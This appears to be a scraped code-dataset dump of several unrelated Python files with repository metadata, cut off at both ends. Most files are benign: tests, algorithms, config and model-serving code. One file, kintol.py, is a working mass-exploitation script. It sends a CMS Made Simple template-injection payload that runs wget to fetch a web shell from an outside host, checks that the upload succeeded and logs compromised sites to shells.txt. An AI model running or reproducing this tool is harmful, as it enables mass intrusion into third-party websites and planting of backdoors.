\")\n\n\n\n\n\n\n"},"avg_line_length":{"kind":"number","value":22.5571428571,"string":"22.557143"},"max_line_length":{"kind":"number","value":97,"string":"97"},"alphanum_fraction":{"kind":"number","value":0.5376820773,"string":"0.537682"}}},{"rowIdx":46399,"cells":{"hexsha":{"kind":"string","value":"12cf4624bca1b05e6af0d6fa0ea8fd352dbc7f99"},"size":{"kind":"number","value":3119,"string":"3,119"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"src/onegov/pay/collections/payment.py"},"max_stars_repo_name":{"kind":"string","value":"politbuero-kampagnen/onegov-cloud"},"max_stars_repo_head_hexsha":{"kind":"string","value":"20148bf321b71f617b64376fe7249b2b9b9c4aa9"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"src/onegov/pay/collections/payment.py"},"max_issues_repo_name":{"kind":"string","value":"politbuero-kampagnen/onegov-cloud"},"max_issues_repo_head_hexsha":{"kind":"string","value":"20148bf321b71f617b64376fe7249b2b9b9c4aa9"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 
\"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"src/onegov/pay/collections/payment.py"},"max_forks_repo_name":{"kind":"string","value":"politbuero-kampagnen/onegov-cloud"},"max_forks_repo_head_hexsha":{"kind":"string","value":"20148bf321b71f617b64376fe7249b2b9b9c4aa9"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"from collections import defaultdict\nfrom onegov.core.collection import GenericCollection, Pagination\nfrom onegov.pay.models import Payment\nfrom sqlalchemy import desc\nfrom sqlalchemy.orm import joinedload\nfrom sqlalchemy.orm import undefer\n\n\nclass PaymentCollection(GenericCollection, Pagination):\n \"\"\" Manages the payment records.\n\n To render a list of payments you might want to also consider the\n :class:`onegov.pay.collection.payable.Paybale` collection, which renders\n payments by loading the linked records first.\n\n \"\"\"\n\n def __init__(self, session, source='*', page=0, start=None, end=None):\n super().__init__(session)\n self.source = source\n self.page = page\n self.start = start\n self.end = end\n\n @property\n def model_class(self):\n return Payment.get_polymorphic_class(self.source, Payment)\n\n def add(self, **kwargs):\n if self.source != '*':\n kwargs.setdefault('source', self.source)\n return super().add(**kwargs)\n\n def __eq__(self, other):\n return all((\n self.source == other.source,\n self.page == other.page,\n self.start == other.start,\n self.end == other.end\n ))\n\n def subset(self):\n q = self.query().order_by(desc(Payment.created))\n\n if self.start:\n q = q.filter(self.start <= Payment.created)\n\n if self.end:\n q = 
q.filter(Payment.created <= self.end)\n\n q = q.options(joinedload(Payment.provider))\n q = q.options(undefer(Payment.created))\n return q\n\n @property\n def page_index(self):\n return self.page\n\n def page_by_index(self, index):\n return self.__class__(self.session, self.source, index)\n\n def payment_links_for(self, items):\n \"\"\" A more efficient way of loading all links of the given batch\n (compared to loading payment.links one by one).\n\n \"\"\"\n payment_links = defaultdict(list)\n\n for link in Payment.registered_links.values():\n targets = self.session.query(\n getattr(link.table.columns, link.key)\n ).filter(\n link.table.columns.payment_id.in_(tuple(\n p.id for p in items\n ))\n )\n\n q = self.session.query(link.cls)\n q = q.filter(link.cls.id.in_(targets.subquery()))\n q = q.options(joinedload(link.class_attribute))\n\n for record in q:\n payments = getattr(record, link.attribute)\n\n try:\n for payment in payments:\n payment_links[payment.id].append(record)\n except TypeError:\n payment_links[payments.id].append(record)\n\n return payment_links\n\n def payment_links_by_subset(self, subset=None):\n subset = subset or self.subset()\n return self.payment_links_for(subset)\n\n def payment_links_by_batch(self, batch=None):\n batch = batch or self.batch\n\n if not batch:\n return None\n\n return 
self.payment_links_for(batch)\n"},"avg_line_length":{"kind":"number","value":29.9903846154,"string":"29.990385"},"max_line_length":{"kind":"number","value":76,"string":"76"},"alphanum_fraction":{"kind":"number","value":0.6033985252,"string":"0.603399"}}}],"truncated":false,"partial":false},"paginationData":{"pageIndex":463,"numItemsPerPage":100,"numTotalItems":48262,"offset":46300,"length":100}},"jwt":"eyJhbGciOiJFZERTQSJ9.eyJyZWFkIjp0cnVlLCJwZXJtaXNzaW9ucyI6eyJyZXBvLmNvbnRlbnQucmVhZCI6dHJ1ZX0sImlhdCI6MTc1NjYwNjc2Niwic3ViIjoiL2RhdGFzZXRzL2Jqb2VybnAvdGhlLXN0YWNrLWRlZHVwLXB5dGhvbi1kZXVfTGF0biIsImV4cCI6MTc1NjYxMDM2NiwiaXNzIjoiaHR0cHM6Ly9odWdnaW5nZmFjZS5jbyJ9.ktmnIf8a2bqDsgm6i2gW8PpypwSgf7wGLnB0JlmZVw9sckLt5Qivp2__h2v_i3ZzTwAKc8qAalA2wn7CyyjPCQ","displayUrls":true},"discussionsStats":{"closed":0,"open":0,"total":0},"fullWidth":true,"hasGatedAccess":true,"hasFullAccess":true,"isEmbedded":false,"savedQueries":{"community":[],"user":[]}}">
hexsha
stringlengths
40
40
size
int64
6
782k
ext
stringclasses
7 values
lang
stringclasses
1 value
max_stars_repo_path
stringlengths
4
237
max_stars_repo_name
stringlengths
6
72
max_stars_repo_head_hexsha
stringlengths
40
40
max_stars_repo_licenses
list
max_stars_count
int64
1
53k
max_stars_repo_stars_event_min_datetime
stringlengths
24
24
max_stars_repo_stars_event_max_datetime
stringlengths
24
24
max_issues_repo_path
stringlengths
4
184
max_issues_repo_name
stringlengths
6
72
max_issues_repo_head_hexsha
stringlengths
40
40
max_issues_repo_licenses
list
max_issues_count
int64
1
27.1k
max_issues_repo_issues_event_min_datetime
stringlengths
24
24
max_issues_repo_issues_event_max_datetime
stringlengths
24
24
max_forks_repo_path
stringlengths
4
184
max_forks_repo_name
stringlengths
6
72
max_forks_repo_head_hexsha
stringlengths
40
40
max_forks_repo_licenses
list
max_forks_count
int64
1
12.2k
max_forks_repo_forks_event_min_datetime
stringlengths
24
24
max_forks_repo_forks_event_max_datetime
stringlengths
24
24
content
stringlengths
6
782k
avg_line_length
float64
2.75
664k
max_line_length
int64
5
782k
alphanum_fraction
float64
0
1
e97132f3440cd37e82977a22bf1358f03bf479e0
2,491
py
Python
util/ap/py/HouseRobber2.py
cc13ny/all-in
bc0b01e44e121ea68724da16f25f7e24386c53de
[ "MIT" ]
1
2016-12-29T03:26:39.000Z
2016-12-29T03:26:39.000Z
util/ap/py/HouseRobber2.py
cc13ny/all-in
bc0b01e44e121ea68724da16f25f7e24386c53de
[ "MIT" ]
1
2016-02-09T06:00:07.000Z
2016-02-09T07:20:13.000Z
util/ap/py/HouseRobber2.py
cc13ny/all-in
bc0b01e44e121ea68724da16f25f7e24386c53de
[ "MIT" ]
2
2019-06-27T09:07:26.000Z
2019-07-01T04:40:13.000Z
''' You can run it directly to see results. ''' def rob2(nums): # This problem is similar to Rober_I. # # However, for N houses, # the 1st house and the Nth house # can be robbed at the same time. # # So the tricky point is that this # problem can be divided into two # cases: # 1) The first house considered # and the last one not included # # 2) The last house considered # and the first house not included # # Note: 'considered' != 'included' # # More: there may be duplicate sub-cases # between them, which can be # optimal. if len(nums) == 1: return nums res1 = [0, 0] + nums[:-1] res2 = [0, 0] + nums[1:] for i in range(2, len(res1)): res1[i] = max(res1[i] + res1[i - 2], res1[i - 1]) for i in range(2, len(res2)): res2[i] = max(res2[i] + res2[i - 2], res2[i - 1]) end = len(res2) - 1 return res2[1:] if res2[end] > res1[end] else res1[2:] def find_path(nums, res): idx = [] end = len(res) - 1 i = end while i > - 1: if i > 0: if res[i] != res[i - 1]: idx = [i] + idx i -= 2 else: i -= 1 else: if end not in idx: # decide the first one or the last one # should not be included idx = [0] + idx i -= 1 return idx def testcase(): # test cases # assume that each value is an non-negative integer and there's one house at least. tests = [] tests.append([1, 2, 3, 4, 5, 1, 2, 3, 4, 5]) tests.append([1, 2]) tests.append([1]) tests.append([1, 0, 1]) return tests def print_info(tests): n = 55 print '#' * n print print 'Problem: Robber II' print print '=' * n for i, t in enumerate(tests): assert t != [] res = rob2(t) path = find_path(t, res) val_robb = [t[idx] for idx in path] print print 'test case #' + str(i) + ':' print ' Maximal value: ' + str(res[len(res) - 1]) print ' Values of each house: ' + str(t) print ' Indices of the path: ' + str(path) print ' Robbed values: ' + str(val_robb) print print '=' * n def main(): print_info(testcase()) if __name__ == "__main__": main()
21.474138
87
0.481333
f9391250bde4af50d5279bad53d30e72e5c3ee76
1,326
py
Python
src/Sephrasto/DatenbankEinstellung.py
qeqar/Sephrasto
ce46d46299b2c793f015e25c98908773c39b1dee
[ "MIT" ]
1
2022-02-02T16:15:59.000Z
2022-02-02T16:15:59.000Z
src/Sephrasto/DatenbankEinstellung.py
qeqar/Sephrasto
ce46d46299b2c793f015e25c98908773c39b1dee
[ "MIT" ]
1
2022-01-14T11:04:19.000Z
2022-01-14T11:04:19.000Z
src/Sephrasto/DatenbankEinstellung.py
qeqar/Sephrasto
ce46d46299b2c793f015e25c98908773c39b1dee
[ "MIT" ]
null
null
null
class DatenbankEinstellung(object): def __init__(self): self.name = '' self.beschreibung = '' self.wert = '' self.typ = 'Text' #Text, Float, Int oder Bool self.isUserAdded = True def __eq__(self, other) : if self.__class__ != other.__class__: return False return self.__dict__ == other.__dict__ def toFloat(self): assert self.typ == 'Float' return float(self.wert) def toInt(self): assert self.typ == 'Int' return int(self.wert) def toBool(self): assert self.typ == 'Bool' return self.wert.lower() == 'true' or self.wert == '1' def toText(self): assert self.typ == 'Text' return self.wert def toTextList(self, seperator=',', strip=True): if not self.toText(): return [] if strip: return [t.strip() for t in self.toText().split(seperator)] else: return self.toText().split(seperator) def toTextDict(self, seperator=',', strip=True): list = self.toTextList(seperator, strip) dict = {} for el in list: tmp = el.split("=") if strip: dict[tmp[0].strip()] = tmp[1].strip() else: dict[tmp[0]] = tmp[1] return dict
28.826087
70
0.533183
ddf42ec7829667188d8bc30531a4b2cda0535526
4,820
py
Python
Apps/Vorverarbeitung/validate_subjects_tabel.py
RGreinacher/bachelor-thesis
60dbc03ce40e3ec42f2538d67a6aabfea6fbbfc8
[ "MIT" ]
1
2021-04-13T10:00:46.000Z
2021-04-13T10:00:46.000Z
Apps/Vorverarbeitung/validate_subjects_tabel.py
RGreinacher/bachelor-thesis
60dbc03ce40e3ec42f2538d67a6aabfea6fbbfc8
[ "MIT" ]
null
null
null
Apps/Vorverarbeitung/validate_subjects_tabel.py
RGreinacher/bachelor-thesis
60dbc03ce40e3ec42f2538d67a6aabfea6fbbfc8
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # import python libs import re import json import argparse import json import random from os import listdir from os.path import isfile, join from pprint import pprint as pp from collections import deque import sys sys.path.append('../Auswertung') # import project libs from create_subject_annotation_classes import TARGET_DISTRIBUTION from create_subject_annotation_classes import find_four from helper import * # defining globals & constants SUBJECTS_TABEL_JSON = '/Users/rg/Nextcloud/Uni/Bachelorarbeit/Apps/Vorverarbeitung/subjects_table.json' DISTRIBUTION_TOLERANCE = 2.5 # methods def read_subject_table(file_path): file_handler = open(file_path, 'r', encoding='utf-8') raw_content = file_handler.read() file_handler.close() blocks = json.JSONDecoder().decode(raw_content) return blocks def general_meta_info(subjects_table): for block_index, block in enumerate(subjects_table[0]): print(len(block), 'paragraphs in block', block_index) empty_blocks = empty_subjects_table(subjects_table) for block_index, block in enumerate(empty_blocks): distribution = distribution_per_block(block) print(distribution[5], 'target annotations in block', block_index) def analyze_blocks(subject_blocks, subject_id): level = subject_id % 3 correct_classes = True for block_index, block in enumerate(subject_blocks): distribution = distribution_per_block(block) if (block_index + subject_id) % 2 == 0: if sum(distribution[:5]) != 0: correct_classes = False print('wrong order') break else: if not validate_distribution(distribution, level): correct_classes = False print('bad distribution') break if not validate_fives_for_every_four(block): correct_classes = False print('bad unnecessary annotations') break return correct_classes def distribution_per_block(block): annotation_class_distribution = [0, 0, 0, 0, 0, 0] for paragraph in block: for sentence in paragraph: for annotation_class in sentence: annotation_class_distribution[annotation_class] += 1 return 
annotation_class_distribution def validate_distribution(distribution, level): correct_distribution = True total_annotations = sum(distribution) for annotation_class, annotation_occurence in enumerate(distribution): percentage = (annotation_occurence / total_annotations) * 100.0 if annotation_class == 3 and annotation_occurence > 0: print('✗ class', annotation_class, ' is present, but should not! Level', level, '(', annotation_occurence, 'occurence(s),', round(percentage, 2), '%)') correct_distribution = False lower_bound = TARGET_DISTRIBUTION[level][annotation_class] - DISTRIBUTION_TOLERANCE upper_bound = TARGET_DISTRIBUTION[level][annotation_class] + DISTRIBUTION_TOLERANCE if not (lower_bound <= percentage <= upper_bound): print('✗ class', annotation_class, ', level', level, '(', round(percentage, 2), ')') correct_distribution = False return correct_distribution def validate_fives_for_every_four(block): for sentence in find_four([block]): start_index = 0 while 4 in sentence[start_index:] and start_index < len(sentence): index = sentence.index(4, start_index) if index > 0 and index < len(sentence) - 1: if sentence[index - 1] < 5 and sentence[index + 1] < 5: print('sentence', index) pp(sentence) return False elif index > 0: if sentence[index - 1] < 5: print('sentence', index) pp(sentence) return False elif index < len(sentence) - 1: if sentence[index + 1] < 5: print('sentence', index) pp(sentence) return False else: print('uncought case!', sentence) start_index = index + 1 return True # entry point as a stand alone script if __name__ == '__main__': blocks = read_subject_table(SUBJECTS_TABEL_JSON) general_meta_info(blocks) all_blocks_passed = True for index, distribution in enumerate(blocks): if not analyze_blocks(blocks[index], index): print('✗ Block', index, 'did not pass the analysis!') all_blocks_passed = False break if all_blocks_passed: print('✓ subjects table is correct!') else: print('✗ bad subjects table!')
34.676259
163
0.645228
34dcf3a0668250a09d13c82faddad2fb78163541
6,034
py
Python
Packs/Claroty/Integrations/Claroty/Claroty_test.py
diCagri/content
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
[ "MIT" ]
799
2016-08-02T06:43:14.000Z
2022-03-31T11:10:11.000Z
Packs/Claroty/Integrations/Claroty/Claroty_test.py
diCagri/content
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
[ "MIT" ]
9,317
2016-08-07T19:00:51.000Z
2022-03-31T21:56:04.000Z
Packs/Claroty/Integrations/Claroty/Claroty_test.py
diCagri/content
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
[ "MIT" ]
1,297
2016-08-04T13:59:00.000Z
2022-03-31T23:43:06.000Z
"""Unit tests for the Claroty CTD integration: client authentication,
incident fetching, and the alert/asset query endpoints.

All HTTP traffic is intercepted with the ``requests_mock`` fixture and
demisto params/args are patched via ``mocker``, so no live CTD server
is required.
"""
import dateparser
import demistomock as demisto
from Claroty import Client, fetch_incidents

# Canned /auth/authenticate response; only "token" is consumed by the client.
MOCK_AUTHENTICATION = {
    "first_name": "admin",
    "id": 1,
    "last_name": "admin",
    "mail": "admin",
    "password_expired": False,
    "token": "ok",
    "username": "admin"
}

# Canned response for the resolve-alerts endpoint.
RESOLVE_ALERT_RESPONSE = {
    "success": True
}

# Single-asset result page as returned by /ranger/assets.
GET_ASSETS_RESPONSE = {
    "count_filtered": 1,
    "count_in_page": 1,
    "count_total": 1,
    "objects": [{
        "asset_type": 2,
        "asset_type__": "eEndpoint",
        "class_type": "IT",
        "criticality": 0,
        "criticality__": "eLow",
        "id": 15,
        "insight_names": ["Unsecured Protocols", "Windows CVEs"],
        "ipv4": ["1.1.1.1"],
        "last_seen": "2020-02-16T10:46:00+00:00",
        "mac": ["00:0B:AB:1A:DD:DD"],
        "name": "GTWB",
        "project_parsed": None,
        "resource_id": "15-1",
        "risk_level": 0,
        "site_id": 1,
        "site_name": "site-1",
        "vendor": "Advantech Technology",
        "virtual_zone_name": "Endpoint: Other"
    }]
}

# Single-alert result page as returned by /ranger/alerts.
GET_ALERTS_RESPONSE = {
    "count_filtered": 1,
    "count_in_page": 1,
    "count_total": 1,
    "objects": [{
        "actionable_assets": [{
            "actionable_id": 15,
            "asset": {
                "asset_type": 2,
                "asset_type__": "eEndpoint",
                "hostname": "GTWB",
                "id": 15,
                "ip": ["1.1.1.1"],
                "mac": ["00:0B:AB:1A:DD:DD"],
                "name": "GTWB",
                "network_id": 1,
                "os": "Windows XP",
                "resource_id": "15-1",
                "site_id": 1,
                "vendor": "Advantech Technology"
            },
            "id": 174,
            "resource_id": "174-1",
            "role": 5,
            "role__": "ePrimary",
            "site_id": 1
        }],
        "alert_indicators": [{
            "alert_id": 48,
            "id": 16,
            "indicator_id": 2,
            "indicator_info": {
                "description": "Event occurred out of working hours",
                "id": 2,
                "points": 10,
                "site_id": 1,
                "type": 1
            },
            "indicator_result": False,
            "parent_indicator_id": None,
            "site_id": 1
        }],
        "description": "A configuration has been downloaded to controller [[Chemical_plant]] by [[1.1.1.1]],"
                       " by user ENG_AB\\Administrator",
        "network_id": 1,
        "resolved": False,
        "resource_id": "48-1",
        "severity": 3,
        "severity__": "eCritical",
        "type": 1001,
        "type__": "eConfigurationDownload",
        "timestamp": "2020-02-16T10:46:00+00:00"
    }]
}


def _create_client(mocker, requests_mock, request_url,
                   response_json, request_type, **extra_params):
    # Build a Client against fully mocked demisto params and HTTP routes.
    mocker.patch.object(demisto, 'params', return_value={
        "credentials": {
            'identifier': 'user',
            'password': 'omgSecretsWow',
        },
        'url': 'https://website.com',
        'fetch_time': '7 days'
    })
    # The client always authenticates first, so that route is mocked
    # unconditionally; the endpoint under test is mocked per request_type.
    requests_mock.post('https://website.com:5000/auth/authenticate', json=MOCK_AUTHENTICATION)
    if request_type == "POST" and request_url != 'https://website.com:5000/auth/authenticate':
        requests_mock.post(request_url, json=response_json)
    elif request_type == "GET":
        requests_mock.get(request_url, json=response_json)
    mocker.patch.object(demisto, 'args', return_value={})

    username = demisto.params().get('credentials').get('identifier')
    password = demisto.params().get('credentials').get('password')
    # The CTD API listens on port 5000 of the configured base URL.
    base_url = demisto.params()['url'].rstrip('/') + ':5000'
    verify_certificate = not demisto.params().get('insecure', False)
    proxy = demisto.params().get('proxy', False)

    client = Client(
        base_url=base_url,
        verify=verify_certificate,
        credentials=(username, password),
        proxy=proxy,
    )
    return client


def test_claroty_authentication(mocker, requests_mock):
    """The token from the mocked auth endpoint is surfaced by _generate_token."""
    client = _create_client(mocker, requests_mock,
                            'https://website.com:5000/auth/authenticate',
                            MOCK_AUTHENTICATION, "POST")
    token = client._generate_token()["jwt_token"]
    assert token == 'ok'


def test_claroty_fetch_incidents(mocker, requests_mock):
    """fetch_incidents converts CTD alerts into XSOAR incident dicts."""
    client = _create_client(mocker, requests_mock,
                            "https://website.com:5000/ranger/alerts",
                            GET_ALERTS_RESPONSE, "GET")
    first_fetch_time = demisto.params().get('fetch_time', '7 days').strip()
    mocker.patch.object(demisto, 'incidents')
    nextcheck, incidents = fetch_incidents(client,
                                           {'lastRun': dateparser.parse("2018-10-24T14:13:20+00:00")},
                                           first_fetch_time)
    assert nextcheck['last_fetch']
    assert isinstance(incidents, list)
    assert incidents[0]['severity'] == 4  # Demisto severity is higher by one (doesn't start at 0)
    assert isinstance(incidents[0]['name'], str)


def test_claroty_query_alerts(mocker, requests_mock):
    """get_alerts returns the raw alert page from /ranger/alerts."""
    client = _create_client(mocker, requests_mock,
                            "https://website.com:5000/ranger/alerts",
                            GET_ALERTS_RESPONSE, "GET")
    response = client.get_alerts([], {}, [])
    assert response["objects"][0]["resource_id"] == "48-1"
    assert response["objects"][0]["severity"] == 3
    assert response["objects"][0]["alert_indicators"]


def test_claroty_get_assets(mocker, requests_mock):
    """get_assets returns the raw asset page from /ranger/assets."""
    client = _create_client(mocker, requests_mock,
                            "https://website.com:5000/ranger/assets",
                            GET_ASSETS_RESPONSE, "GET")
    response = client.get_assets([], {}, [])
    assert response["objects"][0]["resource_id"] == "15-1"
    assert response["objects"][0]["name"] == "GTWB"
    assert response["objects"][0]["criticality"] == 0


def test_claroty_resolve_alerts(mocker, requests_mock):
    """resolve_alert posts to the resolve endpoint and reports success."""
    client = _create_client(mocker, requests_mock,
                            'https://website.com:5000/ranger/ranger_api/resolve_alerts',
                            RESOLVE_ALERT_RESPONSE, "POST")
    response = client.resolve_alert(['1-1'], {}, 1, "Test is good")
    assert response["success"]
34.48
128
0.581372
9b2a2f24a980d1ba332ac910eaa0647f7f21b238
3,375
py
Python
suite.py
WarcraftPriests/sl-shadow-priest
4c8753592b3cc18c6d2de7e9227e5adb8cef3208
[ "MIT" ]
13
2020-04-10T17:34:49.000Z
2022-02-13T04:04:30.000Z
suite.py
WarcraftPriests/sl-shadow-priest
4c8753592b3cc18c6d2de7e9227e5adb8cef3208
[ "MIT" ]
213
2020-04-10T04:15:00.000Z
2022-01-20T19:18:55.000Z
suite.py
WarcraftPriests/sl-shadow-priest
4c8753592b3cc18c6d2de7e9227e5adb8cef3208
[ "MIT" ]
7
2020-10-08T07:22:08.000Z
2021-07-08T21:09:33.000Z
"""run full suite of sims""" import argparse import csv import os import subprocess import sys import yaml with open("config.yml", "r", encoding="utf8") as ymlfile: config = yaml.load(ymlfile, Loader=yaml.FullLoader) def call_process(process_args): """runs a process and constantly monitors for output""" subprocess.check_call(process_args, stdout=sys.stdout, stderr=subprocess.STDOUT) def update_state(directory, sim_type, output_file, script): """updates state text file""" with open(output_file, 'a+', encoding="utf8") as file: file.write(f"{directory},{sim_type},{script},\n") file.close() def check_state(sim_dir, sim_type, output_file, script): """opens state file to see if the sim has been ran yet""" with open(output_file, 'r', encoding="utf8") as file: sims = csv.reader(file, delimiter=',') for row in sims: if len(row) == 0: continue if row[0] == sim_dir and row[1] == sim_type and row[2] == script: return False return True def generate_args(sim_dir, sim_type, script, ptr): """generates arguments for each script based on input""" arguments = [] if sim_type == "composite": if ptr: arguments = ["python", script, sim_dir, ptr] else: arguments = ["python", script, sim_dir] elif sim_type == "dungeons": if ptr: arguments = ["python", script, sim_dir, "--dungeons", ptr] else: arguments = ["python", script, sim_dir, "--dungeons"] return arguments def run_suite(sim_dir, sim_type, output_file, sim, ptr): """helper function to orchestrate other calls""" if check_state(sim_dir, sim_type, output_file, "profiles"): call_process(generate_args(sim_dir, sim_type, "profiles.py", ptr)) update_state(sim_dir, sim_type, output_file, "profiles") if check_state(sim_dir, sim_type, output_file, "sim"): print(f"Running sim suite for {sim} - Composite") call_process(generate_args(sim_dir, sim_type, "sim.py", ptr)) update_state(sim_dir, sim_type, output_file, "sim") def main(): """main function, runs sim suite""" output_file = "internal/suite.csv" parser = 
argparse.ArgumentParser(description="Sims full sim suite") parser.add_argument( '--exclude', help='Exclude certain sim folders from the suite run', choices=config["sims"].keys(), default=["apl", "gear", "talent-builds"], nargs='+', required=False) parser.add_argument( '--fresh', help='restart suite from start', action='store_true') parser.add_argument( '--ptr', help='indicate if the sim should use ptr data.', action='store_true') args = parser.parse_args() if args.fresh or not os.path.exists(output_file): with open(output_file, 'w', encoding="utf8") as file: file.write('dir,type,sim,\n') file.close() ptr = "" if args.ptr: print("Running sims with PTR data...") ptr = "--ptr" for sim in config["sims"].keys(): if sim in args.exclude: continue sim_dir = (f"{sim}/") run_suite(sim_dir, "composite", output_file, sim, ptr) run_suite(sim_dir, "dungeons", output_file, sim, ptr) if __name__ == "__main__": main()
33.088235
86
0.623111
1fe1306c59ee5cc7f95e6188f1723c8f2bf1c55e
3,634
py
Python
Kintol_Shell_Upload-main/kintol.py
Zusyaku/Termux-And-Lali-Linux-V2
b1a1b0841d22d4bf2cc7932b72716d55f070871e
[ "Apache-2.0" ]
2
2021-11-17T03:35:03.000Z
2021-12-08T06:00:31.000Z
Kintol_Shell_Upload-main/kintol.py
Zusyaku/Termux-And-Lali-Linux-V2
b1a1b0841d22d4bf2cc7932b72716d55f070871e
[ "Apache-2.0" ]
null
null
null
Kintol_Shell_Upload-main/kintol.py
Zusyaku/Termux-And-Lali-Linux-V2
b1a1b0841d22d4bf2cc7932b72716d55f070871e
[ "Apache-2.0" ]
2
2021-11-05T18:07:48.000Z
2022-02-24T21:25:07.000Z
# -*- coding: utf-8 -* #!/usr/bin/python #Kintol Upload Shell Rce ##################################### import requests, re, urllib2, os, sys, codecs, random import getpass from base64 import b64encode, b64decode from multiprocessing.dummy import Pool from time import time as timer import time import json from zlib import compress, decompress from platform import system from colorama import Fore from colorama import Style from pprint import pprint from colorama import init from urlparse import urlparse import warnings import subprocess from requests.packages.urllib3.exceptions import InsecureRequestWarning warnings.simplefilter('ignore',InsecureRequestWarning) reload(sys) sys.setdefaultencoding('utf8') init(autoreset=True) ########################################################################################## ktnred = '\033[31m' ktngreen = '\033[32m' ktn3yell = '\033[33m' ktn4blue = '\033[34m' ktn5purp = '\033[35m' ktn6blueblue = '\033[36m' ktn7grey = '\033[37m' CEND = '\033[0m' year = time.strftime("%y") month = time.strftime("%m") ##################################### ########################################################################################## def print_logo(): clear = "\x1b[0m" colors = [36, 32, 34, 35, 31, 37] x = """ . . |-. | ,-. ,-. ,-. ,-. ,-. ,-. ,-. ,-. | | | | | | | -- | | ,-| | | ,. | | | | | `-' `' `-' `-| `-| `-^ ' ' `' `-' ' `-| ,| ,| ,| `' `' `' Tools Made Simple CMS Mass Upload Shell Youtube : Logic Internet Blog : https://www.blog-gan.org ICQ : https://icq.im/Shin403 """ for N, line in enumerate(x.split("\n")): sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear)) time.sleep(0.05) print_logo() start_raw = raw_input("\n\033[91mGive,Me List Dear\033[97m:~# \033[97m") crownes = raw_input("\033[91mthread \033[97m\033[97m:~# \033[97m") try: with open(start_raw, 'r') as f: ooo = f.read().splitlines() except IOError: pass try: ooo = list((ooo)) except NameError: print '\033[31mOpen Your Eyes!' 
sys.exit() count=0 with open(start_raw,'r')as f: for line in f: count+=1 print '\x1b[91m[\x1b[92m+\x1b[91m]\x1b[92mTOTAL WEBLIST=',count ##### def expr(url): try: headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20150151 Firefox/28.0'} korek = requests.get(url+'/index.php?mact=News,cntnt01,detail,0&cntnt01articleid=1&cntnt01detailtemplate=string:{php}echo%20system(%2527wget%20http://secpriv8.com/met.txt%20-O%20logicinternet.php%2527);{/php}&cntnt01returnid=1', headers=headers,timeout=10) asu = requests.get(url+'/logicinternet.php',headers=headers,timeout=5) if 'Logic_Internet' in asu.content: print ('Logic: ' + url + ' ' + ktn6blueblue+ 'Made Simple CMS' +ktngreen + ' Success' + CEND) open('shells.txt','a').write(url+'/logicinternet.php\n') else: print ('Internet: ' + url + ' ' +ktn6blueblue+ 'Made Simple CMS' +ktnred + ' Failed' + CEND) except: pass ########################################################################################## def Main(): try: start = timer() pp = Pool(int(crownes)) pr = pp.map(expr, ooo) print('TIME TAKE: ' + str(timer() - start) + ' S') except: pass if __name__ == '__main__': Main()
32.738739
258
0.523941
1f648ae25740a60dc9aedf28e9a9bc66631c7a71
50
py
Python
settings.py
LikeToAccess/RCB
37510facf935a9a8559bdd85ac86b292b5764639
[ "MIT" ]
1
2022-02-02T18:08:10.000Z
2022-02-02T18:08:10.000Z
settings.py
LikeToAccess/RCB
37510facf935a9a8559bdd85ac86b292b5764639
[ "MIT" ]
null
null
null
settings.py
LikeToAccess/RCB
37510facf935a9a8559bdd85ac86b292b5764639
[ "MIT" ]
null
null
null
data_drive_letter = "X" maximum_thread_limit = 12
16.666667
25
0.8
1f7c69a914c989f9203df5f4b99f4bd740dcd6ee
7,179
py
Python
contrib/华为云垃圾分类大赛心得与案例-GitLD/src_Xception_all_aug+TTA/deploy_scripts/customize_service.py
huaweicloud/ModelArts-Lab
75d06fb70d81469cc23cd422200877ce443866be
[ "Apache-2.0" ]
1,045
2019-05-09T02:50:43.000Z
2022-03-31T06:22:11.000Z
contrib/华为云垃圾分类大赛心得与案例-GitLD/src_Xception_all_aug+TTA/deploy_scripts/customize_service.py
huaweicloud/ModelArts-Lab
75d06fb70d81469cc23cd422200877ce443866be
[ "Apache-2.0" ]
1,468
2019-05-16T00:48:18.000Z
2022-03-08T04:12:44.000Z
contrib/华为云垃圾分类大赛心得与案例-GitLD/src_Xception_all_aug+TTA/deploy_scripts/customize_service.py
huaweicloud/ModelArts-Lab
75d06fb70d81469cc23cd422200877ce443866be
[ "Apache-2.0" ]
1,077
2019-05-09T02:50:53.000Z
2022-03-27T11:05:32.000Z
import ast
import numpy as np
from PIL import Image
import tensorflow as tf
from collections import OrderedDict
from tensorflow.python.saved_model import tag_constants
from model_service.tfserving_model_service import TfServingBaseService


class garbage_classify_service(TfServingBaseService):
    """Garbage-classification serving class.

    Loads a SavedModel once at construction, then for every request runs
    the preprocessed image plus three augmented variants (noise+centering,
    darker, brighter) through the network and combines the scores —
    test-time augmentation (TTA).
    """

    def __init__(self, model_name, model_path):
        # these three parameters are no need to modify
        self.model_name = model_name
        self.model_path = model_path
        self.signature_key = 'predict_images'

        self.input_size = 224  # the input image size of the model

        # add the input and output key of your pb model here,
        # these keys are defined when you save a pb file
        self.input_key_1 = 'input_img'
        self.output_key_1 = 'output_score'
        config = tf.ConfigProto(allow_soft_placement=True)
        with tf.get_default_graph().as_default():
            self.sess = tf.Session(graph=tf.Graph(), config=config)
            meta_graph_def = tf.saved_model.loader.load(self.sess, [tag_constants.SERVING], self.model_path)
            self.signature = meta_graph_def.signature_def

            # define input and out tensor of your model here
            input_images_tensor_name = self.signature[self.signature_key].inputs[self.input_key_1].name
